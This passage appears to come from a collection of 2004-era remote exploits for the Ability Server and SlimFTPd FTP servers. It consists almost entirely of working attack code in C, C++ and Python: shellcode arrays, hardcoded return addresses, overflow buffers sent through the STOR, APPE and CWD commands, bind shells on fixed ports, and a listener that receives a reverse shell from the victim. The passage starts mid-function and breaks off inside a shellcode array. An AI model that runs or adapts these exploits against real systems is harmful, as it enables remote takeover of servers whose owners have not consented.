return -1;
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf("[-] Can't open socket!\n");
return -1;
}
their_addr.sin_family = AF_INET; // host byte order
their_addr.sin_port = htons(atoi(argv[2])); // port
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
//memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1)
{
printf("[-] Connecting error\n");
return -1;
}
printf("\n[+] Connected.\n");
read=sizeof(buf);
numbytes=recv(sockfd,buf,read,0);
buf[numbytes]=0x00;
printf("%s \n",buf);
memset(buf,0x00,sizeof(buf));
Sleep(200);
strcpy(buf,"USER ");
memset(buf+strlen(buf),0x41,308);
memcpy(buf+strlen(buf),"\xeb\x06",2);
memset(buf+strlen(buf),0x41,2);
memcpy(buf+strlen(buf),&RetAddr,4);
strcat(buf,shellcode);
buf[strlen(buf)]='\x0a';
printf("[+]Shellcode length: %i \n",strlen(shellcode));
read =strlen(buf);
numbytes=send(sockfd,buf,read,0);
printf("[+] Sending the shellcode\n");
Sleep(2000);
printf("[+] Sleeping\n");
if(fileupload(7777,argv[3],argv[1]))
printf("[+] Have a nice day\n");
closesocket(sockfd);
WSACleanup();
return 0;
}
// [2004-09-12]
21 Ability Server <= 2.34 (STOR) Remote Buffer Overflow Exploit
###################################
# Ability Server 2.34 FTP STOR Buffer Overflow #
# Advanced, secure and easy to use FTP Server. #
# 21 Oct 2004 - muts #
###################################
# D:\BO>ability-2.34-ftp-stor.py #
###################################
# D:\data\tools>nc -v 127.0.0.1 4444 #
# localhost [127.0.0.1] 4444 (?) open #
# Microsoft Windows XP [Version 5.1.2600] #
# (C) Copyright 1985-2001 Microsoft Corp. #
# D:\Program Files\abilitywebserver> #
###################################
import ftplib
from ftplib import FTP
import struct
print "\n\n################################"
print "\nAbility Server 2.34 FTP STOR buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!\n"
print "###################################"
# Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"
# Change RET address if need be.
#buffer = '\x41'*966+struct.pack('<L', 0x7C2FA0F7)+'\x42'*32+sc # RET Windows 2000 Server SP4
buffer = '\x41'*970+struct.pack('<L', 0x7D17D737)+'\x42'*32+sc # RET Windows XP SP2
try:
# Edit the IP, Username and Password.
ftp = FTP('127.0.0.1')
ftp.login('ftp','ftp')
print "\nEvil Buffer sent..."
print "\nSploit will hang now because I couldn\'t figure how to use storelines()."
print "\nTry connecting with netcat to port 4444 on the remote machine."
except:
print "\nCould not Connect to FTP Server."
try:
ftp.transfercmd("STOR " + buffer)
except:
print "\nDone."
# [2004-10-21]
21 Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit
##################################################
## ##
## Ability Ftp Server 2.34 ##
## Remote exploit in APPE command ##
## discovered,exploited by KaGra ##
## Use it with netcat: exploit.py|nc (host) 21 ##
## BindShell at port 4444,one shot OnLy! ##
##################################################
import struct
shell = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
shell += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
shell += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
shell += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
shell += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
shell += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
shell += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
shell += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
shell += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
shell += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
shell += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
shell += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
shell += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
shell += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
shell += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
shell += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
shell += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
shell += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
shell += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
shell += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
shell += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
shell += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
shell += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
shell += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
shell += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"
buffer = '\x41'*968+struct.pack('<L', 0x77da76af)+'\x42'*32+shell # JMP ESP=>0x77da76af Windows XP SP1 EngLisH
print "USER kagra"# Enter a valid username HeRe!
print "PASS kagra"# Enter a valid password HeRe!
print "APPE " + buffer
# [2004-10-23]
21 Ability Server 2.34 FTP STOR Buffer Overflow Exploit (Unix Exploit)
/*
no@0x00:~/Exploits/abilityftp$ ./ability-exploit
**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**
[x] Launching listener.
[x] Bind successfull.
[x] Listening on port 31337.
[x] Connected to: 192.168.0.1.
[x] Sending bad code...done.
[x] Waiting for shell.
[x] Got connection from 192.168.0.1.
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop\abilitywebserver>
reverse shellcode that connects back to 192.168.0.2 lamers get your own shellcode ;)
bad chars 0x00 0x0a 0x0d.
*/
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define RET "\xC7\xF2\xC8\x77" /*win2k adv server sp4*/
#define PORT 21
#define PORT1 31337
#define BACKLOG 1
/* www.metasploit.com*/
char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5a\x81\x 73\x17\x92\x8e"
"\xe9\x41\x83\xeb\xfc\xe2\xf4\x6e\x66\xbf\x41\x92\x 8e\xba\x14\xc4"
"\xd9\x62\x2d\xb6\x96\x62\x04\xae\x05\xbd\x44\xea\x 8f\x03\xca\xd8"
"\x96\x62\x1b\xb2\x8f\x02\xa2\xa0\xc7\x62\x75\x19\x 8f\x07\x70\x6d"
"\x72\xd8\x81\x3e\xb6\x09\x35\x95\x4f\x26\x4c\x93\x 49\x02\xb3\xa9"
"\xf2\xcd\x55\xe7\x6f\x62\x1b\xb6\x8f\x02\x27\x19\x 82\xa2\xca\xc8"
"\x92\xe8\xaa\x19\x8a\x62\x40\x7a\x65\xeb\x70\x52\x d1\xb7\x1c\xc9"
"\x4c\xe1\x41\xcc\xe4\xd9\x18\xf6\x05\xf0\xca\xc9\x 82\x62\x1a\x8e"
"\x05\xf2\xca\xc9\x86\xba\x29\x1c\xc0\xe7\xad\x6d\x 58\x60\x86\x13"
"\x62\xe9\x40\x92\x8e\xbe\x17\xc1\x07\x0c\xa9\x8d\x 8e\xe9\x41\x02"
"\x8f\xe9\x41\x24\x97\xf1\xa6\x36\x97\x99\xa8\x7e\x 77\x43\x21\x4b"
"\x87\x1c\xec\x59\x63\x15\x7a\xc5\xdd\xdb\x1e\xa1\x bc\xe9\x1a\x1f"
"\xc5\xf1\x10\x6d\x59\x60\x9e\x1b\x4d\x64\x34\x86\x e4\xec\x18\xc3"
"\xdd\x16\x75\x1d\x71\xbc\x45\xcb\x07\xed\xcf\x70\x 7c\xc2\x66\xc6"
"\x71\xde\xbe\xc7\xa6\xd8\x81\xc2\xde\xb9\x11\xd2\x de\xa9\x11\x6d"
"\xdb\xcd\xc8\x55\xe6\x29\xe9\x92\x8c\x81\x43\x92\x f4\x80\xc8\x73"
"\xe4\xf9\x10\xc5\x71\xbc\x61\xcb\xd7\x81\x02\xdf\x ca\xe9\xc8\x71"
"\x09\x13\x70\x52\x03\x95\x65\x3e\xe4\xfc\x18\x61\x 25\x6e\xbb\x11"
"\x62\xbd\x87\xd6\xaa\xf9\x05\xf4\x49\xad\x65\xae\x 8f\xe8\xc8\xee"
"\xaa\xa1\xc8\xee\xaa\xa5\xc8\xee\xaa\xb9\xcc\xd6\x aa\xf9\x15\xc2"
"\xdf\xb8\x10\xd3\xdf\xa0\x10\xc3\xdd\xb8\xbe\xe7\x 8e\x81\x33\x6c"
"\x3d\xff\xbe\xc7\x8a\x16\x91\x1b\x68\x16\x34\x92\x e6\x44\x98\x97"
"\x40\x16\x14\x96\x07\x2a\x2b\x6d\x71\xdf\xbe\x41\x 71\x9c\x41\xfa"
"\x7e\x63\x45\xcd\x71\xbc\x45\xa3\x55\xba\xbe\x42\x 8e\xe9\x41";
struct sockaddr_in hrm,lar,target;
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int conn(char *ip)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(PORT);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr *)&hrm,sizeof(struct sockaddr))) < 0)
{
perror("connect");
exit(0);
}
printf("[x] Connected to: %s.\n",ip);
return sockfd;
}
int listener()
{
int sd;
lar.sin_family = AF_INET;
lar.sin_port = htons(PORT1);
lar.sin_addr.s_addr = INADDR_ANY;
bzero(&(lar.sin_zero),8);
sd = socket(AF_INET,SOCK_STREAM,0);
if((bind(sd,(struct sockaddr *)&lar,sizeof(struct sockaddr)))<0)
{
perror("bind");
exit(0);
}
printf("[x] Bind successfull.\n");
if((listen(sd,BACKLOG)) < 0)
{
perror("listen");
exit(0);
}
printf("[x] Listening on port %d.\n",PORT1);
return sd;
}
int main(int argc, char *argv[])
{
char *buffer=malloc(1387),*A=malloc(968),*B=malloc(32), *reply=malloc(200);
int x,l,news,f;
memset(A,0x41,968);
strcat(buffer,A);
memset(B,0x42,32);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);
printf("**Ability Server 2.34 Remote buffer overflow exploit in ftp STOR by NoPh0BiA.**\n");
printf("[x] Launching listener.\n");
l = listener();
x = conn("192.168.0.1");
sleep(5);
printf("[x] Sending bad code...");
write(x,"USER lar\r\nPASS lar\r\n",20);
sleep(3);
write(x,"STOR ",5);
write(x,buffer,strlen(buffer));
write(x,"\r\n\r\n",4);
sleep(3);
printf("done.\n");
printf("[x] Waiting for shell.\n");
close(x);
while(1)
{
news = sizeof(struct sockaddr_in);
if((f=accept(l,(struct sockaddr *)&target,&news)) < 0)
{
perror("accept");
continue;
}
printf("[x] Got connection from %s.\n",inet_ntoa(target.sin_addr));
if(!fork()){
printf("[x] 0wn3d!\n\n");
shell(f);
close(f);
exit(0);
}
close(f);
}
}
// [2004-11-07]
21 SlimFTPd <= 3.15 Remote Buffer Overflow Exploit
/*
SlimFTPd <= 3.15, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.
Full disclosure and exploit
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
10 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------
WHAT IS SLIMFTPD
------------------
Homepage - http://www.whitsoftdev.com/slimftpd/
SlimFTPd is a fully standards-compliant FTP server implementation with an advanced
virtual file system.It is extremely small, but don't let its file size deceive you:
SlimFTPd packs a lot of bang for the kilobyte. It is written in pure Win32 C++ with
no external dependencies and no messy installer. SlimFTPd is a fully multi-threaded
application that runs as a system service on Windows 98/ME or Windows NT/2K/XP, and
it comes with a tool to simplify its installation or uninstallation as a system service.
Once the service is started, SlimFTPd runs quietly in the background.
It reads its configuration from a config file in the same folder as the executable,
and it outputs all activity to a log file in the same place.
The virtual file system allows you to mount any local drive or path to any virtual
path on the server. This allows you to have multiple local drives represented on the
server's virtual file system or just different folders from the same drive.
SlimFTPd allows you to set individual permissions for server paths.
Open slimftpd.conf in your favorite text editor to set up SlimFTPd's configuration.
The format of SlimFTPd's config file is similar to Apache Web Server's for those
familiar with Apache.
--------------
VULNERABILITY
--------------
A simple buffer overflow when a large buffer is passed to different commands,
CWD, STOR, MKD, STAT etc.., nothing more, the attacker need to be logged in,
read the code for further instructions.
----
FIX
----
Actually none, the vendor is contacted, is warning users, and working on a fix.
----
EXTRA
----
Ok I'll try to explain what happen in this one with my crap english...
As you can notice , I havent used as usual a CALL/JMP offset address from a DLL.
Why ? Because if you debug, you will notice that we are able to overwrite
only 3/4 bytes of EIP maximum due to a buffer length restriction in the ftp server (~500bytes).
The 4th byte will always point to 00. But this 00 is enough helpful to fake there my
magic ret ;p
Ok once you understand what is this magic ret , I think that you understanded all there...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
F.U.C.K
K-OTik.com displaying the half part of codes they receive
(also some other friends to me noticed it..., another ie:
JPEG Exploits, 6 or 7 mirrors displayed, poor assh0les...)
*/
#include "winsock2.h"
#include "fstream.h"
char scode[] = "\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
char cmd[]="CWD ";
char call[]="\xb2\x06\x40"; // Magicret ;p
#pragma comment(lib, "ws2_32")
void usage(char* us);
WSADATA wsadata;
void ver();
static char payload[5000];
int main(int argc,char *argv[])
{
ver();
if ((argc<5)||(argc>6)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
char *login=argv[2], *passwd=argv[3], data[10], recvbuf2[100], recvbuf[100], rootbuf[100], logbuf[100], logbuf2[100], pdbuf[100], pdbuf2[100];
int ip=htonl(inet_addr(argv[4])), sz, a, sizeA, lgth, port;
if (argc==6){port=atoi(argv[5]);}
else port=21;
char *os;
if (atoi(argv[1]) == 1){os="Win2k based system";}
if (atoi(argv[1]) == 1){os="Win2k based system";}
if (atoi(argv[1]) == 2){os="WinXP based system";}
if (atoi(argv[1]) == 2){os="WinXP based system";}
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
cout<<"[+] target: "<<os<<endl;
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connect() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, login in process..."<<endl;
Sleep(100);recv(s,recvbuf2,100,0);
if (!strstr(recvbuf2,"220")){cout<<"[+] this is not an ftp server, quitting..."<<endl;return -1;}
strcpy(logbuf,"USER ");strcpy(logbuf2,login);strcpy(pdbuf,"PASS ");strcpy(pdbuf2,passwd);strcpy(rootbuf,"STOU AUX");strcpy(data,"\r\n");
if (send(s,logbuf,strlen(logbuf),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (send(s,logbuf2,strlen(logbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
Sleep(1000);
if (send(s,pdbuf,strlen(pdbuf),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (send(s,pdbuf2,strlen(pdbuf2),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
Sleep(1000);
if (recv(s,recvbuf,200,0)==SOCKET_ERROR){ cout<<"[+] Error during the login processus, check the ftp."<<endl;return -1;}
if (strstr(recvbuf,"530")){ cout<<"[+] wrong login or passwd"<<endl;return -1;}
cout<<"[+] login success!"<<endl;Sleep(1000);cout<<"[+] sending the exploit string"<<endl;
if (atoi(argv[1]) == 1){lgth=500+1;}
if (atoi(argv[1]) == 2){lgth=498+1;}
sizeA=lgth-sizeof(scode);
sz=(sizeA-1)+sizeof(scode)+10;
memset(payload,0,sizeof(payload));
strcat(payload,cmd);strcat(payload,"\x41\x41\x41");
strcat(payload,scode);
for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
strcat(payload,call);
strcat(payload,"\r\n");
Sleep(1000);
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
if (send(s,data,strlen(data),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
Sleep(1000);
cout<<"[+] size of payload: "<<sz<<endl;
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_slim.exe Target Login Pass Ip Port\n"<<endl;
cout<<"TARGETS: "<<endl;
cout<<" [+] 1. Win2k SP4 English Pro (*)"<<endl;
cout<<" [+] 1. Win2k SP4 English Server (*)"<<endl;
cout<<" [+] 1. Win2k all others "<<endl;
cout<<" [+] 2. WinXP SP1 English Pro (*)"<<endl;
cout<<" [+] 2. WinXP SP1 French Pro (*)"<<endl;
cout<<" [+] 2. WinXP all others "<<endl;
cout<<"NOTE: "<<endl;
cout<<" The port 21 is default if no port are specified"<<endl;
cout<<" The exploit bind a shellcode to the port 101"<<endl;
cout<<" A wildcard (*) mean Tested."<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ================================================== =[v0.1]===="<<endl;
cout<<" ========SlimFTPd, Tiny FTP Server for Windows <= v3.15======="<<endl;
cout<<" =============Remote Buffer Overflow Exploit=================="<<endl;
cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
cout<<" ================================================== ==========="<<endl;
cout<<" "<<endl;
}
// [2004-11-10]
21 Ability Server <= 2.34 Remote APPE Buffer Overflow Exploit
/*
TESTED ON WINXP SP0 RUS
(c) by Dark Eagle
from unl0ck research team
http://unl0ck.void.ru
HAPPY NEW YEAR!
Greetz go out to: nekd0, antiq, fl0wsec (setnf, nuTshell), nosystem (CoKi), reflux...
*/
#include <string.h>
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
// shellc0de by m00 team bind 61200
char shellcode[]=
"\x90\x90\x90\x90\x90\xEB\x0F\x58\x80\x30\xBB\x40\x 81\x38\x6D"
"\x30\x30\x21\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF\xFF\x 52\xD7\xBA"
"\xBB\xBB\xE6\xEE\x8A\x60\xDF\x30\xB8\xFB\x28\x30\x F8\x44\xFB"
"\xCE\x42\x30\xE8\xB8\xDD\x8A\x69\xDD\x03\xBB\xAB\x DD\x3A\x81"
"\xF6\xE1\xCF\xBC\x92\x79\x52\x49\x44\x44\x44\x32\x 68\x30\xC1"
"\x87\xBA\x6C\xB8\xE4\xC3\x30\xF0\xA3\x30\xC8\x9B\x 30\xC0\x9F"
"\xBA\x6D\xBA\x6C\x47\x16\xBA\x6B\x2D\x3C\x46\xEA\x 8A\x72\x3B"
"\x7A\xB4\x48\x1D\xC9\xB1\x2D\xE2\x3C\x46\xCF\xA9\x FC\xFC\x59"
"\x5D\x05\xB4\xBB\xBB\xBB\x92\x75\x92\x4C\x52\x53\x 44\x44\x44"
"\x8A\x7B\xDD\x30\xBC\x7A\x5B\xB9\x30\xC8\xA7\xBA\x 6D\xBA\x7D"
"\x16\xBA\x6B\x32\x7D\x32\x6C\xE6\xEC\x36\x26\xB4\x BB\xBB\xBB"
"\xE8\xEC\x44\x6D\x36\x26\xE8\xBB\xBB\xBB\xE8\x44\x 6B\x32\x7C"
"\x36\x3E\xE1\xBB\xBB\xBB\xEB\xEC\x44\x6D\x36\x36\x 2C\xBB\xBB"
"\xBB\xEA\xD3\xB9\xBB\xBB\xBB\x44\x6B\x36\x26\xDE\x BB\xBB\xBB"
"\xE8\xEC\x44\x6D\x8A\x72\xEA\xEA\xEA\xEA\xD3\xBA\x BB\xBB\xBB"
"\xD3\xB9\xBB\xBB\xBB\x44\x6B\x32\x78\x36\x3E\xCB\x BB\xBB\xBB"
"\xEB\xEC\x44\x6D\xD3\xAB\xBB\xBB\xBB\x36\x36\x38\x BB\xBB\xBB"
"\xEA\xE8\x44\x6B\x36\x3E\xCE\xBB\xBB\xBB\xEB\xEC\x 44\x6D\xD3"
"\xBA\xBB\xBB\xBB\xE8\x44\x6B\x36\x3E\xC7\xBB\xBB\x BB\xEB\xEC"
"\x44\x6D\x8A\x72\xEA\xEA\xE8\x44\x6B\xE4\xEB\x36\x 26\xFC\xBB"
"\xBB\xBB\xE8\xEC\x44\x6D\xD3\x44\xBB\xBB\xBB\xD3\x FB\xBB\xBB"
"\xBB\x44\x6B\x32\x78\x36\x36\x93\xBB\xBB\xBB\xEA\x EC\x44\x6D"
